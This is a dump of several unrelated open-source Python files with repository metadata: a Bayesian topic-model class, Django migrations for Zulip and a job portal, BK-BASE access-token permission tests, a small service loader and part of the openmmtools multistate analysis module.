LP['eta0'] = eta0
LP['ElogV'] = ElogV
LP['Elog1mV'] = Elog1mV
LP['ElogPi'] = ElogPi
return LP
def initLPFromResp(self, Data, LP):
''' Obtain initial local params for initializing this model.
'''
resp = LP['resp']
K = resp.shape[1]
DocTopicCount = np.zeros( (Data.nDoc, K))
for d in range(Data.nDoc):
start = Data.doc_range[d]
stop = Data.doc_range[d+1]
if hasattr(Data, 'word_count'):
DocTopicCount[d,:] = np.dot(Data.word_count[start:stop],
resp[start:stop,:])
else:
DocTopicCount[d,:] = np.sum(resp[start:stop,:], axis=0)
DocTopicCount_gt = gtsum(DocTopicCount)
remMass = np.minimum(0.1, 1.0/(K*K))
Ebeta = (1 - remMass) / float(K) * np.ones(K)
Ebeta_gt = gtsum(Ebeta) + remMass
eta1 = DocTopicCount + self.alpha * Ebeta
eta0 = DocTopicCount_gt + self.alpha * Ebeta_gt
digammaBoth = digamma(eta1+eta0)
ElogV = digamma(eta1) - digammaBoth
Elog1mV = digamma(eta0) - digammaBoth
ElogPi = ElogV.copy()
ElogPi[:, 1:] += np.cumsum(Elog1mV[:, :-1], axis=1)
LP['DocTopicCount'] = DocTopicCount
LP['DocTopicCount_gt'] = DocTopicCount_gt
LP['eta1'] = eta1
LP['eta0'] = eta0
LP['ElogV'] = ElogV
LP['Elog1mV'] = Elog1mV
LP['ElogPi'] = ElogPi
return LP
####################################################### Suff Stat Calc
#######################################################
def get_global_suff_stats(self, Data, LP, doPrecompEntropy=None, **kwargs):
''' Calculate sufficient statistics.
'''
resp = LP['resp']
_, K = resp.shape
SS = SuffStatBag(K=K, D=Data.get_dim())
SS.setField('nDoc', Data.nDoc, dims=None)
SS.setField('sumLogVd', np.sum(LP['ElogV'], axis=0), dims='K')
SS.setField('sumLog1mVd', np.sum(LP['Elog1mV'], axis=0), dims='K')
if doPrecompEntropy:
ElogqZ = self.E_logqZ(Data, LP)
VZlocal = self.E_logpVZ_logqV(Data, LP)
SS.setELBOTerm('ElogqZ', ElogqZ, dims='K')
SS.setELBOTerm('VZlocal', VZlocal, dims=None)
return SS
####################################################### VB Global Step
#######################################################
def update_global_params_VB(self, SS, rho=None, **kwargs):
''' Update global parameters.
'''
rho, omega = self._find_optimum_rhoomega(SS, **kwargs)
self.rho = rho
self.omega = omega
self.K = SS.K
self.ClearCache()
def _find_optimum_rhoomega(self, SS, **kwargs):
''' Run numerical optimization to find optimal rho, omega parameters
Args
--------
SS : bnpy SuffStatBag, with K components
Returns
--------
rho : 1D array, length K
omega : 1D array, length K
'''
if hasattr(self, 'rho') and self.rho.size == SS.K:
initrho = self.rho
initomega = self.omega
else:
initrho = None # default initialization
initomega = None
try:
rho, omega, f, Info = OptimHDPSB.find_optimum_multiple_tries(
sumLogVd=SS.sumLogVd,
sumLog1mVd=SS.sumLog1mVd,
nDoc=SS.nDoc,
gamma=self.gamma, alpha=self.alpha,
initrho=initrho, initomega=initomega)
except ValueError as error:
if str(error).count('FAILURE') == 0:
raise error
if hasattr(self, 'rho') and self.rho.size == SS.K:
Log.error('***** Optim failed. Remain at cur val. ' + str(error))
rho = self.rho
omega = self.omega
else:
Log.error('***** Optim failed. Set to default init. ' + str(error))
omega = (1 + self.gamma) * np.ones(SS.K)
rho = OptimHDPSB.create_initrho(K)
return rho, omega
####################################################### Set Global Params
#######################################################
def init_global_params(self, Data, K=0, **kwargs):
''' Initialize rho, omega to reasonable values
'''
self.K = K
self.rho = OptimHDPSB.create_initrho(K)
self.omega = (1.0 + self.gamma) * np.ones(K)
self.ClearCache()
def set_global_params(self, hmodel=None, rho=None, omega=None,
**kwargs):
''' Set rho, omega to provided values.
'''
if hmodel is not None:
self.K = hmodel.allocModel.K
if hasattr(hmodel.allocModel, 'rho'):
self.rho = hmodel.allocModel.rho
self.omega = hmodel.allocModel.omega
else:
raise AttributeError('Unrecognized hmodel')
elif rho is not None and omega is not None:
self.rho = rho
self.omega = omega
self.K = omega.size
else:
self._set_global_params_from_scratch(**kwargs)
self.ClearCache()
def _set_global_params_from_scratch(self, beta=None, topic_prior=None,
Data=None, **kwargs):
''' Set rho, omega to values that reproduce provided appearance probs
'''
if topic_prior is not None:
beta = topic_prior / topic_prior.sum()
if beta is not None:
Ktmp = beta.size
rem = np.minimum(0.05, 1./(Ktmp))
beta = np.hstack([np.squeeze(beta), rem])
beta = beta/np.sum(beta)
else:
raise ValueError('Bad parameters. Vector beta not specified.')
self.K = beta.size - 1
self.rho, self.omega = self._convert_beta2rhoomega(beta, Data.nDoc)
assert self.rho.size == self.K
assert self.omega.size == self.K
def _convert_beta2rhoomega(self, beta, nDoc=10):
''' Find vectors rho, omega that are probable given beta
Returns
--------
rho : 1D array, size K
omega : 1D array, size K
'''
assert abs(np.sum(beta) - 1.0) < 0.001
rho = OptimHDPSB.beta2rho(beta, self.K)
omega = (nDoc + self.gamma) * np.ones(rho.size)
return rho, omega
####################################################### Calc ELBO
#######################################################
def calc_evidence(self, Data, SS, LP, **kwargs):
''' Calculate ELBO objective
'''
UandcV_global = self.E_logpU_logqU_c(SS)
V_global = self.E_logpV__global(SS)
if SS.hasELBOTerms():
ElogqZ = SS.getELBOTerm('ElogqZ')
VZlocal = SS.getELBOTerm('VZlocal')
else:
ElogqZ = self.E_logqZ(Data, LP)
VZlocal = self.E_logpVZ_logqV(Data, LP)
return UandcV_global + V_global + VZlocal - np.sum(ElogqZ)
def E_logqZ(self, Data, LP):
''' Calculate E[ log q(z)] for each active topic
Returns
-------
ElogqZ : 1D array, size K
'''
if hasattr(Data, 'word_count'):
return NumericUtil.calcRlogRdotv(LP['resp'], Data.word_count)
else:
return NumericUtil.calcRlogR(LP['resp'])
def E_logpV__global(self, SS):
''' Calculate the part of E[ log p(v) ] that depends on global topic probs
Returns
--------
Elogstuff : real scalar
'''
Ebeta, Ebeta_gt = self.E_beta_and_betagt()
return np.inner(self.alpha * Ebeta, SS.sumLogVd) \
+ np.inner(self.alpha * Ebeta_gt, SS.sumLog1mVd)
def E_logpVZ_logqV(self, Data, LP):
''' Calculate E[ log p(v) + log p(z) - log q(v) ]
Returns
-------
Elogstuff : real scalar
'''
cDiff = -1 * c_Beta(LP['eta1'], LP['eta0'])
ONcoef = LP['DocTopicCount']
OFFcoef = LP['DocTopicCount_gt']
logBetaPDF = np.sum((ONcoef - LP['eta1']) * LP['ElogV']) \
+ np.sum((OFFcoef - LP['eta0']) * LP['Elog1mV'])
return cDiff + np.sum(logBetaPDF)
def E_logpU_logqU_c(self, SS):
''' Calculate E[ log p(u) - log q(u) ]
Returns
---------
Elogstuff : real scalar
'''
g1 = self.rho * self.omega
g0 = (1-self.rho) * self.omega
digammaBoth = digamma(g1+g0)
ElogU = digamma(g1) - digammaBoth
Elog1mU = digamma(g0) - digammaBoth
ONcoef = SS.nDoc + 1.0 - g1
OFFcoef = SS.nDoc * OptimHDPSB.kvec(self.K) + self.gamma - g0
cDiff = SS.K * c_Beta(1, self.gamma) - c_Beta(g1, g0)
logBetaPDF = np.inner(ONcoef, ElogU) \
+ np.inner(OFFcoef, Elog1mU)
return cDiff + logBetaPDF
def gtsum(Nvec):
''' Calculate new vector where each entry k holds the sum of Nvec[k+1:]
Example
--------
>> gtsum([5, 6, 10])
[16, 10, 0]
'''
if Nvec.ndim == 1:
Ngt = np.cumsum(Nvec[::-1])[::-1]
Ngt[:-1] = Ngt[1:]
Ngt[-1] = 0
return Ngt
#return np.hstack([Ngt[1:], 0])
elif Nvec.ndim == 2:
Ngt = np.fliplr(np.cumsum(np.fliplr(Nvec), axis=1))
zeroCol = np.zeros((Ngt.shape[0],1))
return np.hstack([Ngt[:, 1:], zeroCol])
def c_Beta(a1, a0):
''' Evaluate cumulant function of the Beta distribution
When input is vectorized, we compute sum over all entries.
Returns
-------
c : scalar real
'''
return np.sum(gammaln(a1 + a0)) - np.sum(gammaln(a1)) - np.sum(gammaln(a0))
|
20dd035e884048b09c8120627bba050d06e27212
|
952dc66c61966f099756cdb6c2d13b40352f63cc
|
/zilencer/migrations/0022_remotezulipserver_create_audit_log_backfill.py
|
8570796cf7872e95a9be5549a81399f2db0544ad
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
zulip/zulip
|
5ae6aad35fd9f72996c0a2a9cdd674400966ebf6
|
965a25d91b6ee2db54038f5df855215fa25146b0
|
refs/heads/main
| 2023-08-28T23:43:00.971110
| 2023-08-28T16:47:09
| 2023-08-28T19:33:02
| 43,160,685
| 20,239
| 8,996
|
Apache-2.0
| 2023-09-14T20:57:47
| 2015-09-25T16:37:25
|
Python
|
UTF-8
|
Python
| false
| false
| 1,632
|
py
|
0022_remotezulipserver_create_audit_log_backfill.py
|
from django.db import migrations
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.migrations.state import StateApps
def backfill_remote_zulip_server_creation_log_events(
apps: StateApps, schema_editor: BaseDatabaseSchemaEditor
) -> None:
RemoteZulipServer = apps.get_model("zilencer", "RemoteZulipServer")
RemoteZulipServerAuditLog = apps.get_model("zilencer", "RemoteZulipServerAuditLog")
RemoteZulipServerAuditLog.REMOTE_SERVER_CREATED = 10215
objects_to_create = []
for remote_server in RemoteZulipServer.objects.all():
entry = RemoteZulipServerAuditLog(
server=remote_server,
event_type=RemoteZulipServerAuditLog.REMOTE_SERVER_CREATED,
event_time=remote_server.last_updated,
backfilled=True,
)
objects_to_create.append(entry)
RemoteZulipServerAuditLog.objects.bulk_create(objects_to_create)
def reverse_code(apps: StateApps, schema_editor: BaseDatabaseSchemaEditor) -> None:
RemoteZulipServerAuditLog = apps.get_model("zilencer", "RemoteZulipServerAuditLog")
RemoteZulipServerAuditLog.REMOTE_SERVER_CREATED = 10215
RemoteZulipServerAuditLog.objects.filter(
event_type=RemoteZulipServerAuditLog.REMOTE_SERVER_CREATED, backfilled=True
).delete()
class Migration(migrations.Migration):
dependencies = [
("zilencer", "0021_alter_remotezulipserver_uuid"),
]
operations = [
migrations.RunPython(
backfill_remote_zulip_server_creation_log_events,
reverse_code=reverse_code,
elidable=True,
)
]
|
ff98a67a1e54d68ae451700a21208b46695141ec
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/api/auth/tests/test_auth/test_token.py
|
0f88c7037cfa98caff9da3f80fac6130f926e672
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661
| 2022-04-02T10:30:55
| 2022-04-02T10:30:55
| 381,257,882
| 101
| 51
|
NOASSERTION
| 2022-04-02T10:30:56
| 2021-06-29T06:10:01
|
Python
|
UTF-8
|
Python
| false
| false
| 18,670
|
py
|
test_token.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
from datetime import datetime, timedelta
from unittest import mock
from unittest.mock import MagicMock
from auth.constants import TokenPermissionStatus
from auth.core.permission import TokenPermission
from auth.exceptions import TokenDisabledErr, TokenExpiredErr
from auth.models import TokenTicketPermission
from auth.models.audit_models import AuthAuditRecord
from auth.models.auth_models import AuthDataToken, AuthDataTokenPermission
from auth.models.ticket_models import Ticket
from auth.services.token import TokenGenerator
from auth.tests.utils import BaseTestCase
from common.api.base import DataResponse
MOCK_DATA_SCOPE = {
"is_all": False,
"permissions": [
{
"action_id": "result_table.query_data",
"object_class": "result_table",
"scope_id_key": "result_table_id",
"scope_name_key": "result_table_name",
"scope_object_class": "result_table",
"scope": {"result_table_id": "591_test_rt"},
},
{
"action_id": "project.manage",
"object_class": "project",
"scope_id_key": "project_id",
"scope_name_key": "project_name",
"scope_object_class": "project",
"scope": {"project_id": "1"},
},
{
"action_id": "project.manage_flow",
"object_class": "project",
"scope_id_key": "project_id",
"scope_name_key": "project_name",
"scope_object_class": "project",
"scope": {"project_id": "1"},
},
{
"action_id": "raw_data.etl",
"object_class": "raw_data",
"scope_id_key": "raw_data_id",
"scope_name_key": "raw_data_name",
"scope_object_class": "raw_data",
"scope": {"raw_data_id": "1"},
},
{
"action_id": "raw_data.query_data",
"object_class": "raw_data",
"scope_id_key": "raw_data_id",
"scope_name_key": "raw_data_name",
"scope_object_class": "raw_data",
"scope": {"raw_data_id": "1"},
},
],
}
BK_USERNAME = "processor666"
BK_APP_CODE = "bk_log_search"
EXPIRES = 7
class TokenTestCase(BaseTestCase):
data_token = None
def setUp(self):
super().setUp()
token_generator = TokenGenerator(BK_USERNAME, BK_APP_CODE, MOCK_DATA_SCOPE, EXPIRES)
self.data_token_object = token_generator.create_token(reason="init token")
self.data_token = self.data_token_object.data_token
def test_check(self):
"""
校验权限是否写入
@return:
"""
for _perm in MOCK_DATA_SCOPE.get("permissions", []):
ret = TokenPermission(self.data_token).check(
_perm["action_id"], list(_perm["scope"].values())[0], bk_app_code=BK_APP_CODE
)
self.assertTrue(ret)
# 非法对象
ret = TokenPermission(self.data_token).check("result_table.query_data", "592_test_rt", bk_app_code=BK_APP_CODE)
self.assertFalse(ret)
# 非法 APP_CODE
ret = TokenPermission(self.data_token).check("result_table.query_data", "591_test_rt", bk_app_code="data")
self.assertFalse(ret)
# 校验子对象
ret = TokenPermission(self.data_token).check("flow.update", "1", bk_app_code=BK_APP_CODE)
ret = TokenPermission(self.data_token).check("flow.update", "2", bk_app_code=BK_APP_CODE)
self.assertFalse(ret)
# 状态修改
o_token = AuthDataToken.objects.get(data_token=self.data_token)
o_token._status = "disabled"
o_token.save()
self.assertRaises(
TokenDisabledErr,
TokenPermission(self.data_token).check,
"result_table.query_data",
"591_test_rt",
bk_app_code=BK_APP_CODE,
raise_exception=True,
)
# 修改过期时间
o_token = AuthDataToken.objects.get(data_token=self.data_token)
o_token._status = "enabled"
o_token.expired_at = datetime.now() - timedelta(days=1)
o_token.save()
self.assertRaises(
TokenExpiredErr,
TokenPermission(self.data_token).check,
"result_table.query_data",
"591_test_rt",
bk_app_code=BK_APP_CODE,
raise_exception=True,
)
def test_token_approve(self):
"""
测试没有权限的用户,需要产生审批单据
"""
scope = {
"is_all": False,
"permissions": [
{
"action_id": "project.manage",
"object_class": "project",
"scope_id_key": "project_id",
"scope_name_key": "project_name",
"scope_object_class": "project",
"scope": {"project_id": "1"},
}
],
}
token_generator = TokenGenerator("user01", BK_APP_CODE, scope, EXPIRES)
o_token = token_generator.create_token(reason="init token")
data_token_id = o_token.id
data_token = o_token.data_token
ret = TokenPermission(data_token).check("project.manage", "1", bk_app_code=BK_APP_CODE)
self.assertFalse(ret)
ticket_permissions = TokenTicketPermission.objects.filter(subject_id=data_token_id)
self.assertEqual(len(ticket_permissions), 1)
ticket_id = ticket_permissions[0].ticket_id
self.assertEqual(Ticket.objects.get(id=ticket_id).status, "processing")
def test_create_token(self, data_scope=MOCK_DATA_SCOPE):
"""
正常流程
@param data_scope:
@return:
"""
token_generator = TokenGenerator(BK_USERNAME, BK_APP_CODE, data_scope, EXPIRES)
o_token = AuthDataToken.objects.get(data_token=self.data_token)
self.assertTrue(o_token.data_token == self.data_token)
self.assertTrue(o_token.created_by == BK_USERNAME)
self.assertTrue(o_token.data_token_bk_app_code == BK_APP_CODE)
self.assertTrue(o_token.description == "init token")
self.assertTrue(
AuthDataTokenPermission.objects.filter(data_token=o_token).count()
== len(token_generator.data_scope_permission)
)
def test_create_token_for_applying(self):
"""
创建需审批的授权码
@return:
"""
data_scope = {
"is_all": False,
"permissions": [
{
"action_id": "result_table.query_data",
"object_class": "result_table",
"scope_id_key": "result_table_id",
"scope_name_key": "result_table_name",
"scope_object_class": "result_table",
"scope": {"result_table_id": "666_test_rt"},
},
],
}
token_generator = TokenGenerator(BK_USERNAME, BK_APP_CODE, data_scope, EXPIRES)
data_token = token_generator.create_token().data_token
self.assertTrue(
AuthDataTokenPermission.objects.filter(
data_token__data_token=data_token, status=TokenPermissionStatus.APPLYING
).count()
== len(token_generator.data_scope_permission)
)
ret = TokenPermission(data_token).check("result_table.query_data", "592_test_rt", bk_app_code=BK_APP_CODE)
self.assertFalse(ret)
# def test_create_token_without_permission(self):
# """
# 绕过页面,通过API申请无权限的数据范围
# @return:
# """
# data_scope = {
# "is_all": False,
# "permissions": [
# {
# "action_id": "result_table.query_data",
# "object_class": "result_table",
# "scope_id_key": "result_table_id",
# "scope_name_key": "result_table_name",
# "scope_object_class": "result_table",
# "scope": {
# "result_table_id": "593_test_rt"
# }
# },
# ]
# }
# token_generator = TokenGenerator(BK_USERNAME, BK_APP_CODE, data_scope, EXPIRES)
# with self.assertRaises(PermissionDeniedError):
# token_generator.create_token()
def test_mock_direct_pass_perm(self):
"""
直接通过,mock
@return:
"""
data_scope = {
"is_all": False,
"permissions": [
{
"action_id": "result_table.query_data",
"object_class": "result_table",
"scope_id_key": "result_table_id",
"scope_name_key": "result_table_name",
"scope_object_class": "result_table",
"scope": {"result_table_id": "591_test_rt"},
},
],
}
token_generator = TokenGenerator(BK_USERNAME, BK_APP_CODE, data_scope, EXPIRES)
# 直接授权,不产生单据
token_generator.is_direct_pass = MagicMock(return_value=True)
o_data_token = token_generator.create_token()
self.assertFalse(TokenTicketPermission.objects.filter(subject_id=o_data_token.id).exists())
self.assertTrue(
AuthDataTokenPermission.objects.filter(data_token=o_data_token, status=TokenPermissionStatus.ACTIVE).count()
== len(token_generator.data_scope_permission)
)
# 申请审批单据
token_generator.is_direct_pass = MagicMock(return_value=False)
o_data_token = token_generator.create_token()
self.assertTrue(TokenTicketPermission.objects.filter(subject_id=o_data_token.id).exists())
self.assertTrue(
AuthDataTokenPermission.objects.filter(data_token=o_data_token, status=TokenPermissionStatus.ACTIVE).count()
== len(token_generator.data_scope_permission)
)
def test_check_api(self):
url = "/v3/auth/tokens/check/"
params = {
"check_app_code": BK_APP_CODE,
"check_data_token": self.data_token,
"action_id": "result_table.query_data",
"object_id": "591_test_rt",
}
response = self.client.post(url, json.dumps(params), content_type="application/json")
data = self.is_api_success(response)
self.assertTrue(data)
def test_retrive_by_data_token_api(self):
url = "/v3/auth/tokens/retrive_by_data_token/"
params = {"search_data_token": self.data_token}
response = self.client.get(url, params)
data = self.is_api_success(response)
self.assertTrue(data["data_token"], self.data_token)
def test_exchange_default_data_token(self):
url = "/v3/auth/tokens/exchange_default_data_token/"
params = {"data_token_bk_app_code": "bk_log_search"}
response = self.client.post(url, params)
data = self.is_api_success(response)
self.assertEqual(data["data_token_bk_app_code"], "bk_log_search")
params = {"data_token_bk_app_code": "gem"}
response = self.client.post(url, params)
data = self.is_api_success(response)
self.assertIsNone(data)
def test_list(self):
# 除了 setup 初次创建的 Token 以外,再建一个新的,便于测试列表接口
token_generator = TokenGenerator("others", BK_APP_CODE, {"is_all": False, "permissions": []}, EXPIRES)
token_generator.create_token(reason="init token2")
url = "/v3/auth/tokens/"
params = {"bkdata_authentication_method": "user", "bk_username": BK_USERNAME}
response = self.client.get(url, params)
data = self.is_api_success(response)
self.assertEqual(len(data), 1)
def test_renewal(self):
"""
测试对 DataToken 进行续期
"""
data_token_id = self.data_token_object.id
# 第一次续期由于只有 7 天,可以续期
url = f"/v3/auth/tokens/{data_token_id}/renewal/"
params = {"expire": 30, "bkdata_authentication_method": "user", "bk_username": BK_USERNAME}
response = self.post(url, params)
self.is_api_success(response)
record = AuthAuditRecord.objects.all()[0]
self.assertEqual(record.created_by, BK_USERNAME)
self.assertEqual(record.audit_object_id, str(data_token_id))
# 第二次续期由于已经 37 天,不需要续期
url = f"/v3/auth/tokens/{data_token_id}/renewal/"
params = {"expire": 30, "bkdata_authentication_method": "user", "bk_username": BK_USERNAME}
response = self.post(url, params)
self.is_api_success(response)
self.assertEqual(AuthAuditRecord.objects.all().count(), 1)
def test_retrieve(self):
data_token_id = self.data_token_object.id
url = f"/v3/auth/tokens/{data_token_id}/"
params = {"bkdata_authentication_method": "user", "bk_username": BK_USERNAME}
response = self.client.get(url, params)
data = self.is_api_success(response)
self.assertIn("permissions", data)
self.assertTrue(len(data["permissions"]) > 0)
self.assertIn("scopes", data)
url = f"/v3/auth/tokens/{data_token_id}/"
params = {
"bkdata_authentication_method": "user",
"bk_username": BK_USERNAME,
"permission_status": "applying",
"show_display": "False",
"show_scope_structure": "False",
}
response = self.client.get(url, params)
data = self.is_api_success(response)
self.assertIn("permissions", data)
self.assertEqual(len(data["permissions"]), 0)
self.assertNotIn("scopes", data)
@mock.patch("auth.handlers.result_table.MetaApi.list_result_table")
@mock.patch("auth.services.token.TokenGenerator.create_token")
def test_upsert_datascope_for_queue(self, patch_create_token, patch_list_result_table):
patch_create_token.return_value = AuthDataToken(data_token=1, data_token_bk_app_code="xxxx")
patch_list_result_table.return_value = DataResponse(
{"data": [{"result_table_id": "591_presto_cluster", "storages": {"tspider": {}}}]}
)
url = "/v3/auth/tokens/"
params = {
"data_token_bk_app_code": "xxxx",
"data_scope": {
"permissions": [
{
"action_id": "result_table.query_queue",
"object_class": "result_table",
"scope_id_key": "result_table_id",
"scope_object_class": "result_table",
"scope": {
"result_table_id": "591_presto_cluster",
},
}
]
},
"reason": "dsff",
"expire": 7,
}
response = self.post(url, params)
self.is_api_failure(response)
patch_list_result_table.return_value = DataResponse(
{"data": [{"result_table_id": "591_dimension_rt", "storages": {"queue": {}, "tspider": {}}}]}
)
params = {
"data_token_bk_app_code": "xxxx",
"data_scope": {
"permissions": [
{
"action_id": "result_table.query_queue",
"object_class": "result_table",
"scope_id_key": "result_table_id",
"scope_object_class": "result_table",
"scope": {
"result_table_id": "591_dimension_rt",
},
}
]
},
"reason": "dsff",
"expire": 7,
}
response = self.post(url, params)
self.is_api_success(response)
@mock.patch("auth.handlers.resource_group.StoreKitApi.list_cluster_by_type")
@mock.patch("auth.services.token.TokenGenerator.create_token")
def test_upsert_datascope_for_res_group(self, patch_create_token, patch_list_cluster_by_type):
patch_create_token.return_value = AuthDataToken(data_token=1, data_token_bk_app_code="xxxx")
patch_list_cluster_by_type.return_value = DataResponse(
{"data": [{"cluster_type": "presto", "cluster_group": "aiops"}]}
)
url = "/v3/auth/tokens/"
params = {
"data_token_bk_app_code": "xxxx",
"data_scope": {
"permissions": [
{
"action_id": "resource_group.use",
"object_class": "resource_group",
"scope_id_key": "resource_group_id",
"scope_object_class": "resource_group",
"scope": {
"resource_group_id": "aiops",
},
}
]
},
"reason": "dsff",
"expire": 7,
}
response = self.post(url, params)
self.is_api_success(response)
|
b01a39529f99c9978f2871472fc3ca5dd5cfdcf5
|
28bd76bd768656eee11c5e79e284b75e4af10559
|
/peeldb/migrations/0053_auto_20220412_0906.py
|
95f88bed2b07016316e7c81fad2eb19373f97a9a
|
[
"MIT"
] |
permissive
|
MicroPyramid/opensource-job-portal
|
debfa0b15f8cd0ab82153a143841c3af0801f46a
|
e21aa8fa62df96f41ddbea913f386ee7c6780ed0
|
refs/heads/master
| 2023-07-29T09:38:00.241309
| 2022-11-29T02:17:04
| 2022-11-29T02:17:04
| 227,341,330
| 360
| 208
|
MIT
| 2023-07-25T15:19:17
| 2019-12-11T10:42:38
|
HTML
|
UTF-8
|
Python
| false
| false
| 535
|
py
|
0053_auto_20220412_0906.py
|
# Generated by Django 3.2.11 on 2022-04-12 09:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("peeldb", "0052_rename_job_id_usermessage_job"),
]
operations = [
migrations.AlterField(
model_name="city",
name="meta",
field=models.JSONField(null=True),
),
migrations.AlterField(
model_name="skill",
name="meta",
field=models.JSONField(null=True),
),
]
|
6dac6952af9dd509c700a420dcb32df22cdf5eab
|
3b63782b0c499deeb9e52b1cfe10e0de1f0c14a9
|
/service/__init__.py
|
eb78f055c926f4faa292a87b77bdcff4072ee53c
|
[] |
no_license
|
laobubu/ssland
|
db119efec0f1c635ae994e4308123f1108aa5f4f
|
80aff970c608c51f6fca1f447507f4a03fd9bbe3
|
refs/heads/universal
| 2021-01-21T15:00:04.921472
| 2018-04-08T15:29:15
| 2018-04-08T15:29:15
| 59,768,159
| 113
| 27
| null | 2018-04-08T15:29:16
| 2016-05-26T17:00:52
|
Python
|
UTF-8
|
Python
| false
| false
| 174
|
py
|
__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
def getService(name):
import importlib
ServiceModule = importlib.import_module("service." + name)
return ServiceModule
|
245e28d06aef31bc5cde6faf39c4d6f2f8540a34
|
399369f692f5776f0ded367e18fd5762bea2d997
|
/openmmtools/multistate/multistateanalyzer.py
|
ae7fd793d5a5254fda6df0843ed8b986a98f30ee
|
[
"MIT"
] |
permissive
|
choderalab/openmmtools
|
5b78fb7d187e8b9f03f1dd439eecd0ddaa467c65
|
6cef59b67327d1a16685304368e87e99a37a441c
|
refs/heads/main
| 2023-08-30T20:20:31.429532
| 2023-08-22T21:46:15
| 2023-08-22T21:46:15
| 25,416,166
| 192
| 74
|
MIT
| 2023-08-25T23:59:11
| 2014-10-19T02:52:35
|
Python
|
UTF-8
|
Python
| false
| false
| 116,449
|
py
|
multistateanalyzer.py
|
#!/usr/local/bin/env python
# ==============================================================================
# MODULE DOCSTRING
# ==============================================================================
"""
MultiStateAnalyzers
===================
Analysis tools and module for MultiStateSampler simulations. Provides programmatic and automatic
"best practices" integration to determine free energy and other observables.
Fully extensible to support new samplers and observables.
"""
# =============================================================================================
# MODULE IMPORTS
# =============================================================================================
import abc
import copy
import inspect
import logging
import re
from typing import Optional, NamedTuple, Union
import mdtraj
import numpy as np
try:
import openmm
import openmm.unit as units
except ImportError: # OpenMM < 7.6
from simtk import openmm
import simtk.unit as units
from scipy.special import logsumexp
from openmmtools import multistate, utils, forces
from openmmtools.multistate.pymbar import (
statistical_inefficiency_multiple,
subsample_correlated_data,
MBAR,
)
ABC = abc.ABC
logger = logging.getLogger(__name__)
__all__ = [
'PhaseAnalyzer',
'MultiStateSamplerAnalyzer',
'MultiPhaseAnalyzer',
'ObservablesRegistry',
'default_observables_registry'
]
# =============================================================================================
# GLOBAL VARIABLES
# =============================================================================================
kB = units.BOLTZMANN_CONSTANT_kB * units.AVOGADRO_CONSTANT_NA
_OPENMM_ENERGY_UNIT = units.kilojoules_per_mole
_MDTRAJ_DISTANCE_UNIT = units.nanometers
# =============================================================================================
# UTILITY FUNCTIONS
# =============================================================================================
def compute_centroid_distance(positions_group1, positions_group2, weights_group1, weights_group2):
"""Compute the distance between the centers of mass of the two groups.
The two positions given must have the same units.
Parameters
----------
positions_group1 : numpy.array
The positions of the particles in the first CustomCentroidBondForce group.
positions_group2 : numpy.array
The positions of the particles in the second CustomCentroidBondForce group.
weights_group1 : list of float
The mass of the particle in the first CustomCentroidBondForce group.
weights_group2 : list of float
The mass of the particles in the second CustomCentroidBondForce group.
"""
assert len(positions_group1) == len(weights_group1)
assert len(positions_group2) == len(weights_group2)
# Compute center of mass for each group.
com_group1 = np.average(positions_group1, axis=0, weights=weights_group1)
com_group2 = np.average(positions_group2, axis=0, weights=weights_group2)
# Compute distance between centers of mass.
distance = np.linalg.norm(com_group1 - com_group2)
return distance
# =============================================================================================
# MODULE CLASSES
# =============================================================================================
class ObservablesRegistry(object):
"""
Registry of computable observables.
This is a class accessed by the :class:`PhaseAnalyzer` objects to check
which observables can be computed, and then provide a regular categorization of them.
This registry is a required linked component of any PhaseAnalyzer and especially of the MultiPhaseAnalyzer.
This is not an internal class to the PhaseAnalyzer however because it can be instanced, extended, and customized
as part of the API for this module.
To define your own methods:
1) Choose a unique observable name.
2) Categorize the observable in one of the following ways by adding to the list in the "observables_X" method:
2a) "defined_by_phase":
Depends on the Phase as a whole (state independent)
2b) "defined_by_single_state":
Computed entirely from one state, e.g. Radius of Gyration
2c) "defined_by_two_states":
Property is relative to some reference state, such as Free Energy Difference
3) Optionally categorize the error category calculation in the "observables_with_error_adding_Y" methods
If not placed in an error category, the observable will be assumed not to carry error
Examples: A, B, C are the observable in 3 phases, eA, eB, eC are the error of the observable in each phase
3a) "linear": Error between phases adds linearly.
If C = A + B, eC = eA + eB
3b) "quadrature": Error between phases adds in the square.
If C = A + B, eC = sqrt(eA^2 + eB^2)
4) Finally, to add this observable to the phase, implement a "get_{method name}" method to the subclass of
:class:`YankPhaseAnalyzer`. Any :class:`MultiPhaseAnalyzer` composed of this phase will automatically have the
"get_{method name}" if all other phases in the :class:`MultiPhaseAnalyzer` have the same method.
"""
def __init__(self):
"""Register Defaults"""
# Create empty registry
self._observables = {'two_state': set(),
'one_state': set(),
'phase': set()}
self._errors = {'quad': set(),
'linear': set(),
None: set()}
def register_two_state_observable(self, name: str,
error_class: Optional[str]=None,
re_register: bool=False):
"""
Register a new two state observable, or re-register an existing one.
Parameters
